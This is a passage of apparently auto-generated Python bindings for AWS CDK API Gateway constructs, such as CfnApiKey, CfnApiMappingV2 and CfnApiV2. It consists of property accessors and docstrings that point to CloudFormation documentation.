:param rest_api: The RestApi resource to target.
:param base_path: The base path name that callers of the API must provide in the URL after the domain name (e.g. ``example.com/base-path``). If you specify this property, it can't be an empty string. Default: - map requests from the domain root (e.g. ``example.com``). If this is undefined, no additional mappings will be allowed on this domain name.
"""
props = BasePathMappingProps(domain_name=domain_name, rest_api=rest_api, base_path=base_path)
jsii.create(BasePathMapping, self, [scope, id, props])
@jsii.data_type(jsii_type="@aws-cdk/aws-apigateway.BasePathMappingOptions", jsii_struct_bases=[], name_mapping={'base_path': 'basePath'})
class BasePathMappingOptions():
def __init__(self, *, base_path: typing.Optional[str]=None):
"""
:param base_path: The base path name that callers of the API must provide in the URL after the domain name (e.g. ``example.com/base-path``). If you specify this property, it can't be an empty string. Default: - map requests from the domain root (e.g. ``example.com``). If this is undefined, no additional mappings will be allowed on this domain name.
"""
self._values = {
}
if base_path is not None: self._values["base_path"] = base_path
@property
def base_path(self) -> typing.Optional[str]:
"""The base path name that callers of the API must provide in the URL after the domain name (e.g. ``example.com/base-path``). If you specify this property, it can't be an empty string.
default
:default:
- map requests from the domain root (e.g. ``example.com``). If this
is undefined, no additional mappings will be allowed on this domain name.
"""
return self._values.get('base_path')
def __eq__(self, rhs) -> bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs) -> bool:
return not (rhs == self)
def __repr__(self) -> str:
return 'BasePathMappingOptions(%s)' % ', '.join(k + '=' + repr(v) for k, v in self._values.items())
@jsii.data_type(jsii_type="@aws-cdk/aws-apigateway.BasePathMappingProps", jsii_struct_bases=[BasePathMappingOptions], name_mapping={'base_path': 'basePath', 'domain_name': 'domainName', 'rest_api': 'restApi'})
class BasePathMappingProps(BasePathMappingOptions):
def __init__(self, *, base_path: typing.Optional[str]=None, domain_name: "IDomainName", rest_api: "IRestApi"):
"""
:param base_path: The base path name that callers of the API must provide in the URL after the domain name (e.g. ``example.com/base-path``). If you specify this property, it can't be an empty string. Default: - map requests from the domain root (e.g. ``example.com``). If this is undefined, no additional mappings will be allowed on this domain name.
:param domain_name: The DomainName to associate with this base path mapping.
:param rest_api: The RestApi resource to target.
"""
self._values = {
'domain_name': domain_name,
'rest_api': rest_api,
}
if base_path is not None: self._values["base_path"] = base_path
@property
def base_path(self) -> typing.Optional[str]:
"""The base path name that callers of the API must provide in the URL after the domain name (e.g. ``example.com/base-path``). If you specify this property, it can't be an empty string.
default
:default:
- map requests from the domain root (e.g. ``example.com``). If this
is undefined, no additional mappings will be allowed on this domain name.
"""
return self._values.get('base_path')
@property
def domain_name(self) -> "IDomainName":
"""The DomainName to associate with this base path mapping."""
return self._values.get('domain_name')
@property
def rest_api(self) -> "IRestApi":
"""The RestApi resource to target."""
return self._values.get('rest_api')
def __eq__(self, rhs) -> bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs) -> bool:
return not (rhs == self)
def __repr__(self) -> str:
return 'BasePathMappingProps(%s)' % ', '.join(k + '=' + repr(v) for k, v in self._values.items())
@jsii.implements(aws_cdk.core.IInspectable)
class CfnAccount(aws_cdk.core.CfnResource, metaclass=jsii.JSIIMeta, jsii_type="@aws-cdk/aws-apigateway.CfnAccount"):
"""A CloudFormation ``AWS::ApiGateway::Account``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-account.html
cloudformationResource:
:cloudformationResource:: AWS::ApiGateway::Account
"""
def __init__(self, scope: aws_cdk.core.Construct, id: str, *, cloud_watch_role_arn: typing.Optional[str]=None) -> None:
"""Create a new ``AWS::ApiGateway::Account``.
:param scope: - scope in which this resource is defined.
:param id: - scoped id of the resource.
:param props: - resource properties.
:param cloud_watch_role_arn: ``AWS::ApiGateway::Account.CloudWatchRoleArn``.
"""
props = CfnAccountProps(cloud_watch_role_arn=cloud_watch_role_arn)
jsii.create(CfnAccount, self, [scope, id, props])
@jsii.member(jsii_name="inspect")
def inspect(self, inspector: aws_cdk.core.TreeInspector) -> None:
"""Examines the CloudFormation resource and discloses attributes.
:param inspector: - tree inspector to collect and process attributes.
stability
:stability: experimental
"""
return jsii.invoke(self, "inspect", [inspector])
@jsii.member(jsii_name="renderProperties")
def _render_properties(self, props: typing.Mapping[str,typing.Any]) -> typing.Mapping[str,typing.Any]:
"""
:param props: -
"""
return jsii.invoke(self, "renderProperties", [props])
@classproperty
@jsii.member(jsii_name="CFN_RESOURCE_TYPE_NAME")
def CFN_RESOURCE_TYPE_NAME(cls) -> str:
"""The CloudFormation resource type name for this resource class."""
return jsii.sget(cls, "CFN_RESOURCE_TYPE_NAME")
@property
@jsii.member(jsii_name="cfnProperties")
def _cfn_properties(self) -> typing.Mapping[str,typing.Any]:
return jsii.get(self, "cfnProperties")
@property
@jsii.member(jsii_name="cloudWatchRoleArn")
def cloud_watch_role_arn(self) -> typing.Optional[str]:
"""``AWS::ApiGateway::Account.CloudWatchRoleArn``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-account.html#cfn-apigateway-account-cloudwatchrolearn
"""
return jsii.get(self, "cloudWatchRoleArn")
@cloud_watch_role_arn.setter
def cloud_watch_role_arn(self, value: typing.Optional[str]):
return jsii.set(self, "cloudWatchRoleArn", value)
@jsii.data_type(jsii_type="@aws-cdk/aws-apigateway.CfnAccountProps", jsii_struct_bases=[], name_mapping={'cloud_watch_role_arn': 'cloudWatchRoleArn'})
class CfnAccountProps():
def __init__(self, *, cloud_watch_role_arn: typing.Optional[str]=None):
"""Properties for defining a ``AWS::ApiGateway::Account``.
:param cloud_watch_role_arn: ``AWS::ApiGateway::Account.CloudWatchRoleArn``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-account.html
"""
self._values = {
}
if cloud_watch_role_arn is not None: self._values["cloud_watch_role_arn"] = cloud_watch_role_arn
@property
def cloud_watch_role_arn(self) -> typing.Optional[str]:
"""``AWS::ApiGateway::Account.CloudWatchRoleArn``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-account.html#cfn-apigateway-account-cloudwatchrolearn
"""
return self._values.get('cloud_watch_role_arn')
def __eq__(self, rhs) -> bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs) -> bool:
return not (rhs == self)
def __repr__(self) -> str:
return 'CfnAccountProps(%s)' % ', '.join(k + '=' + repr(v) for k, v in self._values.items())
@jsii.implements(aws_cdk.core.IInspectable)
class CfnApiKey(aws_cdk.core.CfnResource, metaclass=jsii.JSIIMeta, jsii_type="@aws-cdk/aws-apigateway.CfnApiKey"):
"""A CloudFormation ``AWS::ApiGateway::ApiKey``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-apikey.html
cloudformationResource:
:cloudformationResource:: AWS::ApiGateway::ApiKey
"""
def __init__(self, scope: aws_cdk.core.Construct, id: str, *, customer_id: typing.Optional[str]=None, description: typing.Optional[str]=None, enabled: typing.Optional[typing.Union[typing.Optional[bool], typing.Optional[aws_cdk.core.IResolvable]]]=None, generate_distinct_id: typing.Optional[typing.Union[typing.Optional[bool], typing.Optional[aws_cdk.core.IResolvable]]]=None, name: typing.Optional[str]=None, stage_keys: typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional[typing.List[typing.Union[aws_cdk.core.IResolvable, "StageKeyProperty"]]]]]=None, tags: typing.Optional[typing.List[aws_cdk.core.CfnTag]]=None, value: typing.Optional[str]=None) -> None:
"""Create a new ``AWS::ApiGateway::ApiKey``.
:param scope: - scope in which this resource is defined.
:param id: - scoped id of the resource.
:param props: - resource properties.
:param customer_id: ``AWS::ApiGateway::ApiKey.CustomerId``.
:param description: ``AWS::ApiGateway::ApiKey.Description``.
:param enabled: ``AWS::ApiGateway::ApiKey.Enabled``.
:param generate_distinct_id: ``AWS::ApiGateway::ApiKey.GenerateDistinctId``.
:param name: ``AWS::ApiGateway::ApiKey.Name``.
:param stage_keys: ``AWS::ApiGateway::ApiKey.StageKeys``.
:param tags: ``AWS::ApiGateway::ApiKey.Tags``.
:param value: ``AWS::ApiGateway::ApiKey.Value``.
"""
props = CfnApiKeyProps(customer_id=customer_id, description=description, enabled=enabled, generate_distinct_id=generate_distinct_id, name=name, stage_keys=stage_keys, tags=tags, value=value)
jsii.create(CfnApiKey, self, [scope, id, props])
@jsii.member(jsii_name="inspect")
def inspect(self, inspector: aws_cdk.core.TreeInspector) -> None:
"""Examines the CloudFormation resource and discloses attributes.
:param inspector: - tree inspector to collect and process attributes.
stability
:stability: experimental
"""
return jsii.invoke(self, "inspect", [inspector])
@jsii.member(jsii_name="renderProperties")
def _render_properties(self, props: typing.Mapping[str,typing.Any]) -> typing.Mapping[str,typing.Any]:
"""
:param props: -
"""
return jsii.invoke(self, "renderProperties", [props])
@classproperty
@jsii.member(jsii_name="CFN_RESOURCE_TYPE_NAME")
def CFN_RESOURCE_TYPE_NAME(cls) -> str:
"""The CloudFormation resource type name for this resource class."""
return jsii.sget(cls, "CFN_RESOURCE_TYPE_NAME")
@property
@jsii.member(jsii_name="cfnProperties")
def _cfn_properties(self) -> typing.Mapping[str,typing.Any]:
return jsii.get(self, "cfnProperties")
@property
@jsii.member(jsii_name="tags")
def tags(self) -> aws_cdk.core.TagManager:
"""``AWS::ApiGateway::ApiKey.Tags``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-apikey.html#cfn-apigateway-apikey-tags
"""
return jsii.get(self, "tags")
@property
@jsii.member(jsii_name="customerId")
def customer_id(self) -> typing.Optional[str]:
"""``AWS::ApiGateway::ApiKey.CustomerId``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-apikey.html#cfn-apigateway-apikey-customerid
"""
return jsii.get(self, "customerId")
@customer_id.setter
def customer_id(self, value: typing.Optional[str]):
return jsii.set(self, "customerId", value)
@property
@jsii.member(jsii_name="description")
def description(self) -> typing.Optional[str]:
"""``AWS::ApiGateway::ApiKey.Description``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-apikey.html#cfn-apigateway-apikey-description
"""
return jsii.get(self, "description")
@description.setter
def description(self, value: typing.Optional[str]):
return jsii.set(self, "description", value)
@property
@jsii.member(jsii_name="enabled")
def enabled(self) -> typing.Optional[typing.Union[typing.Optional[bool], typing.Optional[aws_cdk.core.IResolvable]]]:
"""``AWS::ApiGateway::ApiKey.Enabled``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-apikey.html#cfn-apigateway-apikey-enabled
"""
return jsii.get(self, "enabled")
@enabled.setter
def enabled(self, value: typing.Optional[typing.Union[typing.Optional[bool], typing.Optional[aws_cdk.core.IResolvable]]]):
return jsii.set(self, "enabled", value)
@property
@jsii.member(jsii_name="generateDistinctId")
def generate_distinct_id(self) -> typing.Optional[typing.Union[typing.Optional[bool], typing.Optional[aws_cdk.core.IResolvable]]]:
"""``AWS::ApiGateway::ApiKey.GenerateDistinctId``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-apikey.html#cfn-apigateway-apikey-generatedistinctid
"""
return jsii.get(self, "generateDistinctId")
@generate_distinct_id.setter
def generate_distinct_id(self, value: typing.Optional[typing.Union[typing.Optional[bool], typing.Optional[aws_cdk.core.IResolvable]]]):
return jsii.set(self, "generateDistinctId", value)
@property
@jsii.member(jsii_name="name")
def name(self) -> typing.Optional[str]:
"""``AWS::ApiGateway::ApiKey.Name``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-apikey.html#cfn-apigateway-apikey-name
"""
return jsii.get(self, "name")
@name.setter
def name(self, value: typing.Optional[str]):
return jsii.set(self, "name", value)
@property
@jsii.member(jsii_name="stageKeys")
def stage_keys(self) -> typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional[typing.List[typing.Union[aws_cdk.core.IResolvable, "StageKeyProperty"]]]]]:
"""``AWS::ApiGateway::ApiKey.StageKeys``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-apikey.html#cfn-apigateway-apikey-stagekeys
"""
return jsii.get(self, "stageKeys")
@stage_keys.setter
def stage_keys(self, value: typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional[typing.List[typing.Union[aws_cdk.core.IResolvable, "StageKeyProperty"]]]]]):
return jsii.set(self, "stageKeys", value)
@property
@jsii.member(jsii_name="value")
def value(self) -> typing.Optional[str]:
"""``AWS::ApiGateway::ApiKey.Value``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-apikey.html#cfn-apigateway-apikey-value
"""
return jsii.get(self, "value")
@value.setter
def value(self, value: typing.Optional[str]):
return jsii.set(self, "value", value)
@jsii.data_type(jsii_type="@aws-cdk/aws-apigateway.CfnApiKey.StageKeyProperty", jsii_struct_bases=[], name_mapping={'rest_api_id': 'restApiId', 'stage_name': 'stageName'})
class StageKeyProperty():
def __init__(self, *, rest_api_id: typing.Optional[str]=None, stage_name: typing.Optional[str]=None):
"""
:param rest_api_id: ``CfnApiKey.StageKeyProperty.RestApiId``.
:param stage_name: ``CfnApiKey.StageKeyProperty.StageName``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apigateway-apikey-stagekey.html
"""
self._values = {
}
if rest_api_id is not None: self._values["rest_api_id"] = rest_api_id
if stage_name is not None: self._values["stage_name"] = stage_name
@property
def rest_api_id(self) -> typing.Optional[str]:
"""``CfnApiKey.StageKeyProperty.RestApiId``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apigateway-apikey-stagekey.html#cfn-apigateway-apikey-stagekey-restapiid
"""
return self._values.get('rest_api_id')
@property
def stage_name(self) -> typing.Optional[str]:
"""``CfnApiKey.StageKeyProperty.StageName``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apigateway-apikey-stagekey.html#cfn-apigateway-apikey-stagekey-stagename
"""
return self._values.get('stage_name')
def __eq__(self, rhs) -> bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs) -> bool:
return not (rhs == self)
def __repr__(self) -> str:
return 'StageKeyProperty(%s)' % ', '.join(k + '=' + repr(v) for k, v in self._values.items())
@jsii.data_type(jsii_type="@aws-cdk/aws-apigateway.CfnApiKeyProps", jsii_struct_bases=[], name_mapping={'customer_id': 'customerId', 'description': 'description', 'enabled': 'enabled', 'generate_distinct_id': 'generateDistinctId', 'name': 'name', 'stage_keys': 'stageKeys', 'tags': 'tags', 'value': 'value'})
class CfnApiKeyProps():
def __init__(self, *, customer_id: typing.Optional[str]=None, description: typing.Optional[str]=None, enabled: typing.Optional[typing.Union[typing.Optional[bool], typing.Optional[aws_cdk.core.IResolvable]]]=None, generate_distinct_id: typing.Optional[typing.Union[typing.Optional[bool], typing.Optional[aws_cdk.core.IResolvable]]]=None, name: typing.Optional[str]=None, stage_keys: typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional[typing.List[typing.Union[aws_cdk.core.IResolvable, "CfnApiKey.StageKeyProperty"]]]]]=None, tags: typing.Optional[typing.List[aws_cdk.core.CfnTag]]=None, value: typing.Optional[str]=None):
"""Properties for defining a ``AWS::ApiGateway::ApiKey``.
:param customer_id: ``AWS::ApiGateway::ApiKey.CustomerId``.
:param description: ``AWS::ApiGateway::ApiKey.Description``.
:param enabled: ``AWS::ApiGateway::ApiKey.Enabled``.
:param generate_distinct_id: ``AWS::ApiGateway::ApiKey.GenerateDistinctId``.
:param name: ``AWS::ApiGateway::ApiKey.Name``.
:param stage_keys: ``AWS::ApiGateway::ApiKey.StageKeys``.
:param tags: ``AWS::ApiGateway::ApiKey.Tags``.
:param value: ``AWS::ApiGateway::ApiKey.Value``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-apikey.html
"""
self._values = {
}
if customer_id is not None: self._values["customer_id"] = customer_id
if description is not None: self._values["description"] = description
if enabled is not None: self._values["enabled"] = enabled
if generate_distinct_id is not None: self._values["generate_distinct_id"] = generate_distinct_id
if name is not None: self._values["name"] = name
if stage_keys is not None: self._values["stage_keys"] = stage_keys
if tags is not None: self._values["tags"] = tags
if value is not None: self._values["value"] = value
@property
def customer_id(self) -> typing.Optional[str]:
"""``AWS::ApiGateway::ApiKey.CustomerId``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-apikey.html#cfn-apigateway-apikey-customerid
"""
return self._values.get('customer_id')
@property
def description(self) -> typing.Optional[str]:
"""``AWS::ApiGateway::ApiKey.Description``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-apikey.html#cfn-apigateway-apikey-description
"""
return self._values.get('description')
@property
def enabled(self) -> typing.Optional[typing.Union[typing.Optional[bool], typing.Optional[aws_cdk.core.IResolvable]]]:
"""``AWS::ApiGateway::ApiKey.Enabled``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-apikey.html#cfn-apigateway-apikey-enabled
"""
return self._values.get('enabled')
@property
def generate_distinct_id(self) -> typing.Optional[typing.Union[typing.Optional[bool], typing.Optional[aws_cdk.core.IResolvable]]]:
"""``AWS::ApiGateway::ApiKey.GenerateDistinctId``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-apikey.html#cfn-apigateway-apikey-generatedistinctid
"""
return self._values.get('generate_distinct_id')
@property
def name(self) -> typing.Optional[str]:
"""``AWS::ApiGateway::ApiKey.Name``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-apikey.html#cfn-apigateway-apikey-name
"""
return self._values.get('name')
@property
def stage_keys(self) -> typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional[typing.List[typing.Union[aws_cdk.core.IResolvable, "CfnApiKey.StageKeyProperty"]]]]]:
"""``AWS::ApiGateway::ApiKey.StageKeys``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-apikey.html#cfn-apigateway-apikey-stagekeys
"""
return self._values.get('stage_keys')
@property
def tags(self) -> typing.Optional[typing.List[aws_cdk.core.CfnTag]]:
"""``AWS::ApiGateway::ApiKey.Tags``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-apikey.html#cfn-apigateway-apikey-tags
"""
return self._values.get('tags')
@property
def value(self) -> typing.Optional[str]:
"""``AWS::ApiGateway::ApiKey.Value``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-apikey.html#cfn-apigateway-apikey-value
"""
return self._values.get('value')
def __eq__(self, rhs) -> bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs) -> bool:
return not (rhs == self)
def __repr__(self) -> str:
return 'CfnApiKeyProps(%s)' % ', '.join(k + '=' + repr(v) for k, v in self._values.items())
@jsii.implements(aws_cdk.core.IInspectable)
class CfnApiMappingV2(aws_cdk.core.CfnResource, metaclass=jsii.JSIIMeta, jsii_type="@aws-cdk/aws-apigateway.CfnApiMappingV2"):
"""A CloudFormation ``AWS::ApiGatewayV2::ApiMapping``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-apimapping.html
cloudformationResource:
:cloudformationResource:: AWS::ApiGatewayV2::ApiMapping
"""
def __init__(self, scope: aws_cdk.core.Construct, id: str, *, api_id: str, domain_name: str, stage: str, api_mapping_key: typing.Optional[str]=None) -> None:
"""Create a new ``AWS::ApiGatewayV2::ApiMapping``.
:param scope: - scope in which this resource is defined.
:param id: - scoped id of the resource.
:param props: - resource properties.
:param api_id: ``AWS::ApiGatewayV2::ApiMapping.ApiId``.
:param domain_name: ``AWS::ApiGatewayV2::ApiMapping.DomainName``.
:param stage: ``AWS::ApiGatewayV2::ApiMapping.Stage``.
:param api_mapping_key: ``AWS::ApiGatewayV2::ApiMapping.ApiMappingKey``.
"""
props = CfnApiMappingV2Props(api_id=api_id, domain_name=domain_name, stage=stage, api_mapping_key=api_mapping_key)
jsii.create(CfnApiMappingV2, self, [scope, id, props])
@jsii.member(jsii_name="inspect")
def inspect(self, inspector: aws_cdk.core.TreeInspector) -> None:
"""Examines the CloudFormation resource and discloses attributes.
:param inspector: - tree inspector to collect and process attributes.
stability
:stability: experimental
"""
return jsii.invoke(self, "inspect", [inspector])
@jsii.member(jsii_name="renderProperties")
def _render_properties(self, props: typing.Mapping[str,typing.Any]) -> typing.Mapping[str,typing.Any]:
"""
:param props: -
"""
return jsii.invoke(self, "renderProperties", [props])
@classproperty
@jsii.member(jsii_name="CFN_RESOURCE_TYPE_NAME")
def CFN_RESOURCE_TYPE_NAME(cls) -> str:
"""The CloudFormation resource type name for this resource class."""
return jsii.sget(cls, "CFN_RESOURCE_TYPE_NAME")
@property
@jsii.member(jsii_name="cfnProperties")
def _cfn_properties(self) -> typing.Mapping[str,typing.Any]:
return jsii.get(self, "cfnProperties")
@property
@jsii.member(jsii_name="apiId")
def api_id(self) -> str:
"""``AWS::ApiGatewayV2::ApiMapping.ApiId``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-apimapping.html#cfn-apigatewayv2-apimapping-apiid
"""
return jsii.get(self, "apiId")
@api_id.setter
def api_id(self, value: str):
return jsii.set(self, "apiId", value)
@property
@jsii.member(jsii_name="domainName")
def domain_name(self) -> str:
"""``AWS::ApiGatewayV2::ApiMapping.DomainName``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-apimapping.html#cfn-apigatewayv2-apimapping-domainname
"""
return jsii.get(self, "domainName")
@domain_name.setter
def domain_name(self, value: str):
return jsii.set(self, "domainName", value)
@property
@jsii.member(jsii_name="stage")
def stage(self) -> str:
"""``AWS::ApiGatewayV2::ApiMapping.Stage``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-apimapping.html#cfn-apigatewayv2-apimapping-stage
"""
return jsii.get(self, "stage")
@stage.setter
def stage(self, value: str):
return jsii.set(self, "stage", value)
@property
@jsii.member(jsii_name="apiMappingKey")
def api_mapping_key(self) -> typing.Optional[str]:
"""``AWS::ApiGatewayV2::ApiMapping.ApiMappingKey``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-apimapping.html#cfn-apigatewayv2-apimapping-apimappingkey
"""
return jsii.get(self, "apiMappingKey")
@api_mapping_key.setter
def api_mapping_key(self, value: typing.Optional[str]):
return jsii.set(self, "apiMappingKey", value)
@jsii.data_type(jsii_type="@aws-cdk/aws-apigateway.CfnApiMappingV2Props", jsii_struct_bases=[], name_mapping={'api_id': 'apiId', 'domain_name': 'domainName', 'stage': 'stage', 'api_mapping_key': 'apiMappingKey'})
class CfnApiMappingV2Props():
def __init__(self, *, api_id: str, domain_name: str, stage: str, api_mapping_key: typing.Optional[str]=None):
"""Properties for defining a ``AWS::ApiGatewayV2::ApiMapping``.
:param api_id: ``AWS::ApiGatewayV2::ApiMapping.ApiId``.
:param domain_name: ``AWS::ApiGatewayV2::ApiMapping.DomainName``.
:param stage: ``AWS::ApiGatewayV2::ApiMapping.Stage``.
:param api_mapping_key: ``AWS::ApiGatewayV2::ApiMapping.ApiMappingKey``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-apimapping.html
"""
self._values = {
'api_id': api_id,
'domain_name': domain_name,
'stage': stage,
}
if api_mapping_key is not None: self._values["api_mapping_key"] = api_mapping_key
@property
def api_id(self) -> str:
"""``AWS::ApiGatewayV2::ApiMapping.ApiId``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-apimapping.html#cfn-apigatewayv2-apimapping-apiid
"""
return self._values.get('api_id')
@property
def domain_name(self) -> str:
"""``AWS::ApiGatewayV2::ApiMapping.DomainName``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-apimapping.html#cfn-apigatewayv2-apimapping-domainname
"""
return self._values.get('domain_name')
@property
def stage(self) -> str:
"""``AWS::ApiGatewayV2::ApiMapping.Stage``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-apimapping.html#cfn-apigatewayv2-apimapping-stage
"""
return self._values.get('stage')
@property
def api_mapping_key(self) -> typing.Optional[str]:
"""``AWS::ApiGatewayV2::ApiMapping.ApiMappingKey``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-apimapping.html#cfn-apigatewayv2-apimapping-apimappingkey
"""
return self._values.get('api_mapping_key')
def __eq__(self, rhs) -> bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs) -> bool:
return not (rhs == self)
def __repr__(self) -> str:
return 'CfnApiMappingV2Props(%s)' % ', '.join(k + '=' + repr(v) for k, v in self._values.items())
@jsii.implements(aws_cdk.core.IInspectable)
class CfnApiV2(aws_cdk.core.CfnResource, metaclass=jsii.JSIIMeta, jsii_type="@aws-cdk/aws-apigateway.CfnApiV2"):
"""A CloudFormation ``AWS::ApiGatewayV2::Api``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-api.html
cloudformationResource:
:cloudformationResource:: AWS::ApiGatewayV2::Api
"""
def __init__(self, scope: aws_cdk.core.Construct, id: str, *, name: str, protocol_type: str, route_selection_expression: str, api_key_selection_expression: typing.Optional[str]=None, description: typing.Optional[str]=None, disable_schema_validation: typing.Optional[typing.Union[typing.Optional[bool], typing.Optional[aws_cdk.core.IResolvable]]]=None, tags: typing.Any=None, version: typing.Optional[str]=None) -> None:
"""Create a new ``AWS::ApiGatewayV2::Api``.
:param scope: - scope in which this resource is defined.
:param id: - scoped id of the resource.
:param props: - resource properties.
:param name: ``AWS::ApiGatewayV2::Api.Name``.
:param protocol_type: ``AWS::ApiGatewayV2::Api.ProtocolType``.
:param route_selection_expression: ``AWS::ApiGatewayV2::Api.RouteSelectionExpression``.
:param api_key_selection_expression: ``AWS::ApiGatewayV2::Api.ApiKeySelectionExpression``.
:param description: ``AWS::ApiGatewayV2::Api.Description``.
:param disable_schema_validation: ``AWS::ApiGatewayV2::Api.DisableSchemaValidation``.
:param tags: ``AWS::ApiGatewayV2::Api.Tags``.
:param version: ``AWS::ApiGatewayV2::Api.Version``.
"""
props = CfnApiV2Props(name=name, protocol_type=protocol_type, route_selection_expression=route_selection_expression, api_key_selection_expression=api_key_selection_expression, description=description, disable_schema_validation=disable_schema_validation, tags=tags, version=version)
jsii.create(CfnApiV2, self, [scope, id, props])
@jsii.member(jsii_name="inspect")
def inspect(self, inspector: aws_cdk.core.TreeInspector) -> None:
"""Examines the CloudFormation resource and discloses attributes.
:param inspector: - tree inspector to collect and process attributes.
stability
:stability: experimental
"""
return jsii.invoke(self, "inspect", [inspector])
@jsii.member(jsii_name="renderProperties")
def _render_properties(self, props: typing.Mapping[str,typing.Any]) -> typing.Mapping[str,typing.Any]:
"""
:param props: -
"""
return jsii.invoke(self, "renderProperties", [props])
@classproperty
@jsii.member(jsii_name="CFN_RESOURCE_TYPE_NAME")
def CFN_RESOURCE_TYPE_NAME(cls) -> str:
"""The CloudFormation resource type name for this resource class."""
return jsii.sget(cls, "CFN_RESOURCE_TYPE_NAME")
@property
@jsii.member(jsii_name="cfnProperties")
def _cfn_properties(self) -> typing.Mapping[str,typing.Any]:
return jsii.get(self, "cfnProperties")
@property
@jsii.member(jsii_name="tags")
def tags(self) -> aws_cdk.core.TagManager:
"""``AWS::ApiGatewayV2::Api.Tags``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-api.html#cfn-apigatewayv2-api-tags
"""
return jsii.get(self, "tags")
@property
@jsii.member(jsii_name="name")
def name(self) -> str:
"""``AWS::ApiGatewayV2::Api.Name``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-api.html#cfn-apigatewayv2-api-name
"""
return jsii.get(self, "name")
@name.setter
def name(self, value: str):
return jsii.set(self, "name", value)
@property
@jsii.member(jsii_name="protocolType")
def protocol_type(self) -> str:
"""``AWS::ApiGatewayV2::Api.ProtocolType``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-api.html#cfn-apigatewayv2-api-protocoltype
"""
return jsii.get(self, "protocolType")
@protocol_type.setter
def protocol_type(self, value: str):
return jsii.set(self, "protocolType", value)
@property
@jsii.member(jsii_name="routeSelectionExpression")
def route_selection_expression(self) -> str:
"""``AWS::ApiGatewayV2::Api.RouteSelectionExpression``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-api.html#cfn-apigatewayv2-api-routeselectionexpression
"""
return jsii.get(self, "routeSelectionExpression")
@route_selection_expression.setter
def route_selection_expression(self, value: str):
return jsii.set(self, "routeSelectionExpression", value)
@property
@jsii.member(jsii_name="apiKeySelectionExpression")
def api_key_selection_expression(self) -> typing.Optional[str]:
